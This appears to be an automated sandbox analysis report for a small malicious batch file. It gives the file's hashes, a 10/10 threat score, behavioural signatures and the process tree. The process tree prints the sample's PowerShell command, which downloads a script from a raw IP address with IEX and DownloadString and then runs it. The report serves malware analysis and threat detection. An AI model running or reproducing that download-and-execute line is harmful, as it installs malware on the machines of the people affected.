Analysis
-
max time kernel
103s -
max time network
123s -
platform
windows10_x64 -
resource
win10v191014 -
submitted
10-02-2020 20:10
Static task
static1
Behavioral task
behavioral1
Sample
hvQ21ebW.bat
Resource
win7v191014
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
hvQ21ebW.bat
Resource
win10v191014
windows10_x64
0 signatures
0 seconds
General
-
Target
hvQ21ebW.bat
-
Size
191B
-
MD5
7eb2eb2bf474386d8d7eef5ee2aaf3ef
-
SHA1
c9789a38150044b9ca8a4b9d350df691611f1861
-
SHA256
29b2a12ef2c75d6bb1bdbb4536e478a386dc4082a0756adc219bbd25c724bd1c
-
SHA512
827139be92e830cc7e7d6ac935327fe8960508ecb5e59cf338fb3cd2cc7cda12ae5686f15709bf5fec2cfb399912a9803f7b372601802bcd27e928072638b512
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/hvQ21ebW
Signatures
-
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 5092 WerFault.exe Token: SeBackupPrivilege 5092 WerFault.exe Token: SeDebugPrivilege 5092 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 18 IoCs
Processes:
WerFault.exepid process 5092 WerFault.exe 5092 WerFault.exe 5092 WerFault.exe 5092 WerFault.exe 5092 WerFault.exe 5092 WerFault.exe 5092 WerFault.exe 5092 WerFault.exe 5092 WerFault.exe 5092 WerFault.exe 5092 WerFault.exe 5092 WerFault.exe 5092 WerFault.exe 5092 WerFault.exe 5092 WerFault.exe 5092 WerFault.exe 5092 WerFault.exe 5092 WerFault.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
WerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid process 5092 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\hvQ21ebW.bat"1⤵PID:4984
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/hvQ21ebW');Invoke-PBEESOQZ;Start-Sleep -s 10000"2⤵PID:5028
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5028 -s 7043⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Checks processor information in registry
- Enumerates system info in registry
- Program crash
PID:5092
-
\??\c:\windows\system32\taskhostw.exetaskhostw.exe -RegisterDevice -SettingChange -Full1⤵PID:2976